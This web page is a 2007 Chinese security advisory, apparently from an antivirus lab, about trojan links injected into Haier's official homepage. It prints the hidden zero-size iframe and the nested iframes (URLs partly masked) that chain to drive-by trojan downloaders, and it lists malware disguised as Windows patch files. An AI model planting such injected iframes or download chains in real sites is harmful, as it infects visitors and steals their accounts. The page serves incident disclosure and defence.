用户名:密 码:验证码 我要投稿 电脑技巧 信息订阅 高级搜索 网站地图 加入收藏
中国网管站 中国网管站发展目标  
我要学→
当前位置:中国网管站首页>网络安全>网络应用安全>文章内容

海尔官方网站首页被挂马(图)

来源: 作者: 发布时间:2007-10-26  (阅读次数:)  查看更多关于: 海尔 官方网站 首页 挂马 的文章

一、事件分析:

今日,DSW Lab Avert小组监测到国内知名网站海尔集团(http://www.haier.com)官方页面被挂木马,挂马方式采用常见的.JS脚本,当用户访问海尔集团的首页时会触发木马链接,其中一个挂马链接利用MS07-017ANI光标漏洞,关于光标漏洞见:http://dswlab.com/vir/v20070329.html,页面被插入如下代码,用以激活木马页面连接:
<iframe width='0' height='0' src='http://%**%77%77%2E%38%35%31%37%33%33%2E%63%6E/htm/view.htm?001'></iframe>

被挂马页面截图:

在该被引用的链接中,被嵌入如下代码用来打开不同的页面,进行批量挂马。

<ifr*** width='100' height='100' src='down3/64.htm'></iframe>
<ifr*** width='100' height='100' src='down3/vip.htm'></iframe>
<ifr*** width='100' height='100' src='down3/webxl.htm'></iframe>
<script language="javascript" type="text/javascript" src="http://js.users.51.la/1203774.js"></script>

其中上述三个页面会下载各种木马,其中木马自身有是木马下载器,用来下载更多的木马,其中部分下载木马文件名模仿操作系统补丁,比如:

WindowsXP-KB284303-x86-CHS.exe 是木马: Trojan-PSW.Win32.OnLineGames.abr
WindowsXP-KB888303-x86-CHS.exe 是木马: Trojan-PSW.Win32.OnLineGames.mu
WindowsXP-KB468603-x86-CHS.exe 是木马: Trojan-PSW.Win32.Gamec.ar
WindowsXP-KB138309-x86-CHS.exe 是木马: Backdoor.Win32.Delf.awy
WindowsXP-KB284302-x86-CHS.exe 是木马: Trojan-Spy.Win32.Delf.uv
WindowsXP-KB328207-x86-CHS.exe 是木马: Trojan-PSW.Win32.OnLineGames.afb
WindowsXP-KB238104-x86-CHS.exe 是木马: Trojan-Downloader.Win32.Zlob.byg
WindowsXP-KB423807-x86-CHS.exe 是木马: Trojan-Downloader.Win32.Small.czl
WindowsXP-KB983306-x86-CHS.exe 是木马: Trojan-PSW.Win32.OnLineGames.nn
WindowsXP-KB383300-x86-CHS.exe 是木马: Trojan-Downloader.Win32.Delf.bps
WindowsXP-KB878206-x86-CHS.exe 是木马: Trojan-PSW.Win32.OnLineGames.ads
WindowsXP-KB398305-x86-CHS.exe 是木马: Trojan.Win32.LipGame.cd

下载器下载了更多的木马,包括AV终结者病毒,这些木马被下载执行后,会关闭常见安全软件,并下载其它木马。并将监视用户系统,窃取用户的QQ账号/网游账号等。
在我们更新本文时,挂马者刚刚更新了挂马网页64.htm,增加对AV终结者家族木马家族的下载!

因该网页头部存在:<!-- ARP Viruses --> 代码,有网友认为是海尔网站服务器机房遭受ARP病毒欺骗,从而造成这一情况,经过Avert小组成员对该网段其它主机分析,初步否定了这一观点。

三、解决方案:

1、推荐安装超级巡警监测查杀以上木马。
2、请广大用户及时使用超级巡警的补丁检查功能,检查并安装系统补丁,预防更多的IE漏洞攻击。
3、为了最快保障广大用户不受木马侵害,在事件解决前请暂时不要访问登录该网站。
4、目前海尔对此事件尚无反应。
5、对于已经中毒用户,建议及时修改自己的QQ/网游账号密码。

感谢网友阿达、mopery提供相关信息。

关于海尔集团(引自官方):

海尔集团是世界第四大白色家电制造商、中国最具价值品牌。旗下拥有240多家法人单位,在全球30多个国家建立本土化的设计中心、制造基地和贸易公司,全 球员工总数超过五万人,重点发展科技、工业、贸易、金融四大支柱产业,已发展成全球营业额超过1000亿元规模的跨国企业集团。


上一篇:小浩蠕虫(xiaohao.exe)分析与解决方案(图)   下一篇:系统提示当前安全设置不允许下载该文件怎么办?
[收藏] [推荐] [返回顶部][打印本页] [关闭窗口]  
  相关文章
·小浩蠕虫(xiaohao.exe)分析与解
·无忧校园网络解决方案(图)
·卡巴斯基vs莫名IE窗口弹出解决方
·“蘑菇”病毒解决方案(图)
·U盘(auto病毒)类病毒解析
·经典总结:各个网络端口的入侵方
·局域网盗用IP地址的安全问题解析
·"哈希信息窃取器"暴力破解主机用
·网络的最大威胁 间谍软件成为头
·IDS的缺陷成就了IPS的发展
·经验:避免危害DNS服务器安全部
·从程序的漏洞到服务器的安全渗透
·教你防御网络游戏外挂木马全攻略
·桌面管理能保证企业安全吗?
·解决企业网中存在的通病
·安全技巧:logogo.exe病毒的手动
·高效的NAC方案控制解决方案
·入侵盗QQ号者的网站,取回属于自
·江民升级后重启出现蓝屏的解决办
·DL1.exe U盘病毒的清除教程
  热点文章
·Sniffer Pro监控网络流量(图)
·手工杀毒必备工具!
·企业网络防病毒解决方案
·如何在局域网内防范DDOS攻击
·MSN小尾巴专杀
·Anti ARP Sniffer查找ARP攻击者(
·病毒和木马的隐藏技术解密
·修复任何品牌U盘的工具!Mformat
·如何给微软的软件全面快速地打安
·维护服务器安全的7大技巧
·系统加密
·主流杀毒软件备份全攻略
·拯救被封iPhone功能恢复有限
·怎样保护你的机密文件
·打造一道超级防御的电脑防火墙
·技术分析 TOR实现真正安全传输?(
·经典总结:各个网络端口的入侵方
·U盘(auto病毒)类病毒解析
·防范U盘病毒Autorun.inf的绝招
·合理配置防火墙是保证网络安全的
Copyright@2007 中国网管站 All Rights Reserved 陕ICP备07501327号
E-mail:qidian512@163.com 电话:13759975857
编辑负责QQ:347795937 251695990 技术交流群:45212068